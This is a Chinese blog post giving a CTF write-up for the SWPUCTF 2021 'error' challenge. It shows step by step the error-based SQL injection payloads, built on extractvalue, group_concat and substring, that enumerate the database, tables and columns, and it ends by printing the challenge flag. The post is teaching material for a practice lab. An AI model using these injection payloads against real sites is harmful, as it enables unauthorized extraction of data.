首页 > 其他分享 >Nssctf [SWPUCTF 2021 新生赛]error

Nssctf [SWPUCTF 2021 新生赛]error

时间:2024-08-19 11:04:14浏览次数:9  
标签:group SWPUCTF concat flag 2021 error test tb select

进入之后是一个搜索框,里面叫你传一个id值,先看一看网页代码,发现一端后端数据库代码,说明是报错注入

 

 

 extractValue()报错注入

先进行字段判断,使用 " 1' group by 1# " 来判断

1' group by 1#

正常回显

 出错回显

 说明有三个字段,接着进行数据库名的爆破

1' union select 1,extractvalue(1,concat('~',(select database()))),3#

 

 发现test_db,继续进行爆表

1' union select 1,extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))),3#

 

 出现test_tb,users表名,在test_tb表中继续进行爆字段名

1' union select 1,extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb'))),3#

 

 发现flag,查看字段内容

1' and 1=extractvalue(1,concat('~',(select group_concat(id,'~',flag) from test_tb)))#

 

 

 

 

 ?怎么只有一半,是因为回显不够吗,那我们自己设定一个回显个数

1' and 1=extractvalue(1,concat('~',(select substring(group_concat(id,'~',flag),31,32) from test_tb)))#

 

因为我们第一次爆出的字段内容为30个,所以我们从第31个字段继续显示

 

 

 

 两段flag进行拼接就得到flag啦

NSSCTF{781ab938-3144-4bd4-962a-a3e32558afd5}

 

标签:group,SWPUCTF,concat,flag,2021,error,test,tb,select
From: https://www.cnblogs.com/karasbai/p/18366922

相关文章

  • Windows Sandbox failed to initialize. Error 0x80370106
    #报错提示之前都好好的突然打开WindowsSandbox出现上面提示,经过网上搜索,我的版本是24H2(OSBuild26120.1252) #尝试更新到最新版本  ......
  • HTTP Error 503. The service is unavailable.
    第一次遇见这个问题,装了IIS重写模块导致的。查了资料才知道,是URLRewrite的版本和2012系统的lIS不兼容导致。最新的URLRewrite的版本是2018年9月20日的7.1.1993.2351版,就是这个版本产生问题,不能用在2012上,在它前面的一个版本是2017年6月7日的7.1.1980.0版,这个......
  • [C++ Error] f0201.cpp(11): E2379 Statement missing ;
    错误解释:这个错误表明在C++源代码文件f0201.cpp的第11行出现了一个语法错误,具体是缺少了一个分号;。C++语言规定语句的结束需要使用分号;,如果一个语句缺少了它,编译器就会抛出这样的错误。解决方法:打开f0201.cpp文件``,定位到第11行。检查那一行的代码,确保每个语句后面都有分号;......
  • UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0xaf...--web逆向execjs读取j
    背景做web逆向的时候我们通常是纯python模拟js思路或js+python直接逆向,第二种情况下我们要先获取到想要的js代码,js文件内测试接口后,通过python中的`execjs`模块实现相应接口的调用。通常我们会直接从网站扣下需要的代码(分析后硬扣或通过webpack),然后稍加删改和补环境就直接使用......
  • Vue 报错error:0308010C:digital envelope routines::unsupported
    目录Vue报错error:0308010C:digitalenveloperoutines::unsupported方法1.打开终端(按健win+R弹出窗口,键盘输入cmd,然后敲回车)并按照说明粘贴这些:方法2.安装vnm及node版本方法3.在项目package.json文件中增加配置Vue报错error:0308010C:digitalenveloperoutine......
  • 安装IDEA2021.2.1(含安装包)及其扩展设置
    一、下载通过百度网盘分享的文件:ideaIU-2021.2.1.exe链接:https://pan.baidu.com/s/1cCUHNm0dpWlfkxf5RCEgfw 提取码:v62e 二、安装 安装视频网址:Java基础概念-12-idea的概述和下载安装_哔哩哔哩_bilibili三、idea中的第一个代码 如何该类名四、扩展设置......
  • @clickhouse/client-web部署后出现ClickHose query error:crypto.randomUUID is not a
    crypto.randomUUID报错我这里是因为使用使用@clickhouse/client-web组件,在服务器部署后在浏览器访问界面导致的crypto.randomUUIDisnotafunction报错如果你用http://localhost:端口,在服务器浏览器上访问这个部署的页面,发现不会报错,这是因为,你使用localhost访问......
  • [已解决] Python RecursionError
    [已解决]PythonRecursionError概述在Python编程中,RecursionError是一个常见的错误,它通常发生在递归调用深度过大时。递归是一种强大的编程技术,允许函数调用自身来解决问题。然而,每个递归函数都必须有一个明确的退出条件,以防止无限递归和RecursionError的发生。本文将深......
  • Google Earth Engine(GEE)——1986-2021年黄河入海口区域的逐年影像展示案例分析,并加载
    函数:size()Returnsthenumberofelementsinthecollection.返回集合中元素的数量。Arguments:this:collection(FeatureCollection):Thecollectiontocount.Returns:Integer融合影像可以一个接一个进行融合merge(collection2)Mergestwoimagecollectionsi......
  • LookupError: Resource averaged_perceptron_tagger not found.解决方案
      大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99